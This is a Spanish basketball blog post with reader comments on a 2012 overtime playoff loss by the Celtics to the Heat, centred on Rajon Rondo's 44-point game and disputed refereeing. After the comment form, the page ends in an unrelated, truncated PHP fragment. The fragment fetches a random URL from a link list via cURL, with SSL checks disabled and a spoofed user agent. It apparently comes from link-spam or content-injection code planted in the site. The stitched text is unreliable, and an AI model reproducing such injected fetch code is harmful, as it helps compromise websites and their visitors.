La Crónica: Morir en la orilla

31 de May de 2012 por TheDeerHunter

“Listen, we played terrific. I told them, we played extremely hard. I thought we played with great heart tonight, but I didn’t think we played smart all the time. And there’s things we can absolutely fix, and we’ll do that. We’ll be ready for Friday.”
Doc Rivers

En efecto. Partidazo anoche en el American Airlines de Miami, resuelto en una prórroga.

No fue suficiente la superioridad mostrada por los Celtics en 3 de los 4 cuartos disputados. No fue suficiente la sobrehumana actuación de Rajon Rondo. Los que pedían un mayor peso ofensivo del base vieron colmadas sus exigencias sobradamente. Es la 7ª mayor anotación de un Celtic en playoffs – la primera, por cierto, fue de un tal Havlicek con 54 puntos – pero es la primera vez que alguien acompaña esa cifra con 10 asistencias y 8 rebotes (y 3 robos de regalo). Ni siquiera la magnitud de esos números puede reflejar la magnitud de su actuación. Su nivel de acierto fue toda una anomalía. 83% más allá de los 4 metros y medio. El resto del equipo se quedó por debajo del 40%. 10 de 12 en lanzamiento de media y larga distancia. Su anterior mejor marca en playoffs había sido de sólo 6 lanzamientos. Dudo si él mismo lo creía.

El big three original estuvo digno. Al buen hacer de Garnett se unió Pierce, aunque falló todo triple que intentó y terminó expulsado por faltas. Ray Allen estuvo correcto y anotó el triple que mandó a la postre el partido a la prórroga a falta de 15 segundos. Sin embargo, es casi imposible si el resto aporta lo que aporta. 2 canastas de Bass, una más de Doling, otra de Pietrus y una de Stiensma. Para de contar. Eso en un partido con prórroga y porque Pierce tuvo problemas de faltas. El banquillo es un factor.

Los Heat aún no saben muy bien cómo se llevaron la victoria anoche. 47 tiros libres lanzados, por 29 de Celtics. Una de las mejores actuaciones que se recuerdan de Chalmers y un Haslem vital. Un tercer cuarto arrollador y muy irregulares en el resto. Volvimos a ver fantasmas en el clutch. No fue el mejor día de Wade y LeBron pero logran un efecto moral muy significativo. La mejor manera de viajar a Boston.

PREMIOS

MVP: Si ganan los Heat es más que probable que Lebron James o Dwyane Wade se lleven el premio aunque no hayan jugado el mejor partido de sus vidas. El de Ohio flirteó con el triple doble con 34 puntos, 10 rebotes y 7 asistencias y Wade se quedó en 23 puntos, 6 rebotes y 4 asistencias.

Sorpresa: Gran partido de los secundarios de los Heat no solopor los puntos que anotaron (Mario Chalmers 22, Udonis Haslem 13, Shane Battier 9) sinó por el momento en que lo hicieron. Fueron claves en los últimos minutos del tiempo reglamentario.

Decepción: 7 puntos entre todo el banquillo de los Celtics. A su edad parece contraproducente jugar sólo con 7 hombres.

Esfuerzo en vano: Con Paul Pierce de nuevo eliminado por faltas, Rajon Rondo volvió a convertirse en la principal referencia ofensiva de su equipo. Tras anotar 22 puntos en la primera parte, consiguió los 12 de los Celtics en la prórroga para un total de 44 puntos. Y además repartió 10 asistencias y capturó 8 rebotes. El primer jugador en la historia de los playoffs que firma una actuación similar. Perder tras algo así debe ser frustrante.

Imágenes | AP Photos / Getty Images

Comenta

12 comentarios a esta entrada

  1. GreenPride dice:
    #1

    Partidazo en Miami. Increíble Rondo… y a los Celtics no les llegó para ganar.
    Parece imposible que un equipo como estos Celtics, tan castigados como llegan a estas alturas de la temporada, tan lesionados y tocados todavía sean capaces de sacarse de la manga partidazos como el de ayer. En una primera parte primorosa los Celtics lo hicieron casi todo bien. Pararon las penetraciones de Wade y James obligándoles a lanzar desde fuera, fueron al rebote como lobos y agresivos en ataque para conseguir tiros libres. Rondo entendió que el equipo tiene problemas para anotar y se soltó un partido impresionante en ataque metiéndo desde todos lados, sí sí desde fuera también castigando a los Heat el pasar por detrás de los bloqueos. Esto les dió para llegar hasta 15 de diferencia pero poco a poco los Heat fueron entrando más en el partido. Chalmers sostuvo mucho a los Heat en estos primeros dos cuartos metiendo puntos importantes y LeBron fue aportando aunque forzado a malos porcentajes por las ayudas celticas. Los de Boston sólo sufrían con los triples de los Heat que aprovechaban que la defensa de Boston se cerraba mucho para evitar las penetraciones de Wade&LeBron para sacar triples abiertos.
    En la segunda mitad todo cambió. Los Heat empezaron a jugar su basket agresivo, Wade metió un par de suspensiones y los Heat pudieron correr algo con un LeBron más activo y dieron la vuelta al marcador. Todo parecía indicar que las cosas se decidirían rápidamente pero esta vez los Celtics se negaron a rendirse. Con Rondo liderando las operaciones en ataque y Ray, Pierce y Garnett metiendo algunos tiros los Celtics lucharon y lucharon hasta volver a ponerse arriba y a 3 minutos ganaban de 5 pero ahí perdieron tres ataques consecutivos y los Heat de la mano de LeBron metieron un 9-0 que les ponía 4 arriba a poco más de un minuto. De nuevo parecía decidido y de nuevo no. Canasta rápida de Garnett, un tiro libre fallado por Wade y gran posesión de los Celtics para triple del empate de Ray (cagada defensiva de LeBron ayudando al corte de Dooling y dejando solo a Allen). Esta posesión a la postre fue decisiva porque en la falta a Wade cayó eliminado Pierce y tengo que decir que la falta fue más que dudosa. Luego LeBron falló una bandeja cogió su rebote y volvió a fallar en una suspensión y a la prórroga y en ella más de lo mismo pero con los Celtics muy lastrados en ataque sin Pierce.
    Rondo lideró hasta donde pudo pero con 2 abajo los árbitros se tragaron una clara falta de Wade y el contraataque puso por delante definitivamente a los Heat en el partido. Muy bien Wade en estos minutos con penetraciones decisivas, a los Celtics les fallaron un poco las piernas permitiendo contraataques y entradas de los Heat que no habían permitido hasta entonces.
    Increíble Rondo con 44 puntos (16/24 en tiros, 2/2 triples), 8 rebotes y 10 asistencias y los 12 puntos de los Celtics en la prórroga. Los Celtics consiguieron igualar el rebote y sólo perdieron 8 balones. Quizás les faltó un mejor partido en ataque de Garnett que hizo 6/18 en tiros para 18 puntos y lo que les falta con las lesiones es banco, ayer sólo 7 puntitos. Por los Heat LeBron 34 puntos pero esta vez con 7/20 en tiros y muy bien Wade esperando su momento para decidir con sus penetraciones en la prórroga sin precipitar tiros. Mucha ayuda de los secundarios con 22 y 6 asistencias de Chalmers, 13 y 11 rebotes de Haslem 9 de Battier (3 triples).
    Si con esta actuación los de Boston no han conseguido robar el factor cancha ya parece casi imposible que puedan dar la vuelta a la eliminatoria. Sin embargo, espero que puedan luchar y poner las cosas muy difíciles en el Garden. Este equipo tiene muchísimo carácter como ha vuelto ha demostrar y seguro que caerán con el orgullo intacto.
    Espero batallas en el Garden con mucho juego físico y si Rondo sigue a este nivel (cosa muy difícil) los Celtics podrían tener opciones de igualar. Lo normal sería volver a Miami con un 3-1 y la serie casi decidida pero veremos con qué nos pueden sorprender todavía los Celtics.

      Citar

  2. txusma dice:
    #2

    Aquí podéis ver la falta no pitada que comenta GreenPride:

    http://www.youtube.com/watch?v=KmGTDBR2ye4

    Puede haber marcar el desarrollo no solo del partido sinó de la eliminatoria

      Citar

  3. GreenPride dice:
    #3

    La falta es clarísima, no entiendo cómo puede no pitarse, le da un sopapo en la cara tremendo y además les cuesta la canasta en el contraataque a los Celtics. No sabemos qué hubiera pasado si la pitan pero en un partido tan igualado este tipo de cosas son decisivas y esta sin duda lo fue así como la 6ª falta pitada a Pierce que para mí tampoco es falta. En fin pequeños detalles que definen este tipo de partidos y que esta vez le han salido cruz a los Celtics y les dejan muy tocados

      Citar

  4. MagicJohnson32 dice:
    #4

    Jojojo, vaya falta… Lo siento por los aficionados célticos, un partido así de Rondo se merecía el triunfo. Qué pena, porque el panorama de la eliminatoria cambia radicalmente con un 2-0. Eso sí, no lo tendrán fácil los Heat en Boston, donde el arbitraje será… mmm… digamos que diferente.

      Citar

  5. HisRoyalAirness dice:
    #5

    POr primera vez en basket voy a decir algo muy futbolero: el arbitraje en estos 2 partidos me ha dado asco; ya no hablo del caserismo habitual en playoffs sino decisiones que inclinan la balanza de forma evidente. Ya no es sólo la 6ª falta a Pierce, es que se pone en seguida con 4 y 2 no son. Así ya lastras las posibilidades defensivas de un equipo, sobre todo contra los Heat.

    Lo de Rondo ayer fue sobrehumano

      Citar

  6. jose antonio ramirez dice:
    #6

    Bravo celtics! Bravooo… Solo este equipo es capaz de estas cosas. Que se prepare miami, que no son nada del otro mundo. Mereceria ir 1-1 pero yo huelo el 2-2. Miami me esta decepcionando bastante. Si llegan a las finales san antonio les va a pintar la cara.

      Citar

  7. GreenPride dice:
    #7

    Me encantaría ser igual de optimista que tu jose antonio. Espero que lleves tu razón y los Celtics ganen los 2 del Garden aunque yo lo veo dificil. Si los arbitros son igual de caseros que en estos 2 será más fácil

      Citar

  8. Lucho dice:
    #8

    Ya se que va en contra de la naturaleza del blog, pero el MVP se lo daria a Rondo. No importa que hayan perdido los C`s.
    El esfuerzo en vano puede quedar vacante, o tambien ser para Rondo, daria igual

    OT: La primera vez que veo un jugador que haya llegado a 4 faltas ¡¡¡en el primer cuarto!!!. Y no quiero agregar que encima salia del banco, o sea, no arranco jugando, porque ya seria deamasiado. Hay antecedentes?

      Citar

  9. 111 dice:
    #9

    jose antonio ramirez:
    Bravo celtics! Bravooo… Solo este equipo es capaz de estas cosas. Que se prepare miami, que no son nada del otro mundo. Mereceria ir 1-1 pero yo huelo el 2-2. Miami me esta decepcionando bastante. Si llegan a las finales san antonio les va a pintar la cara.

    Los juegos son todos distintos ademas que te esperas que miami gane por 40 puntos contra quien te crees que estan jugando contra el equipo de tu barrio o contra jugadores profesionales del mejor baloncesto del mundo es mejor no comentar que hablar idioteces

      Citar

  10. 111 dice:
    #10

    Esta serie ya esta tomando forma si con 44 pts de Rondo no le pueden ganar a los Heat no creo que puedan hacer mas que eso ademas rondo no puede anotar todos los partidos 44 pts y cuidado con la barrida.
    Ahora contra San Antonio yo lo he visto jugar y no me parecen un equipo tan superior eso si Westbrook a sido para mi una gran decepcion no lo habia visto jugar tantos partidos y me parece un tipo exageradamente individualista y esto es muy grave tratandose de un base veo mucho mejor a Durant y a Harden muy mal Westbrook de seguir jugando de esta forma los de OKC deberian pensar en cambiarlo por un mejor base.

      Citar

  11. jose antonio ramirez dice:
    #11

    GreenPride:
    Me encantaría ser igual de optimista que tu jose antonio. Espero que lleves tu razón y los Celtics ganen los 2 del Garden aunque yo lo veo dificil. Si los arbitros son igual de caseros que en estos 2 será más fácil

    Hay que ser mas optimistas hombre, que son los celtics y el partido de ayer seguro que no se lo esperaban el 99 x ciento de la peña. Mira yo no es que peque de forofo, es que de verdad que no veo a miami nada del otro mundo, esque les cierras las penetraciones a los dos cracks y no son naaaada. Ganan porque tuvieron un porcentaje brutal en los triples o por lo menos muchos encestados, ademas que el cojo del miller a tenio el mejor partido de sus ultimos años y chalmers y haslem aportaron, cosa que el banquillo de miami no suele, no va a hacer de forma continua. Mira, fijate lo poco que confio en miami, que te digo yo que si boston gana el tercero, pasa la ronda, es mi sensacion. Claro, otra cosa seria que volviera bosh, pero con esta equipo, si es que le quitas a los dos superheroes y son una banda tio, ten en cuenta que el banquillo de boston a menos no puede ir, y que el garden es mucho garden, de echo en 2 partidos de temporada regular no pasaron los heat de 70 puntos, te digo yo que miami no mete puntos faciles alli. El partido de rondo fue legendario, otra vez vuelvo a repetir porque ya es que me molesta bastante que que mas tiene que hacer este hombre para que le consideren el mejor base de la nba, es que todos mis amigos lo dicen, hasta los acerrimos de lakers, no hay nadie, que me dejen de chorradas de que le falta tiro, claro, perfecto no va a ser, menos mal. Tampoco nash y parker tienen mas fisico si nos ponemos a poner pegas. En fin, muchas ganas de que la serie empieze en el garden, los arbitros esperon que le compensen por el partido de esta noche que se lo han regalao, y vuelvo a reiterar que la serie no esta muerta ni mucho menos.

      Citar

  12. Lucho dice:
    #12

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>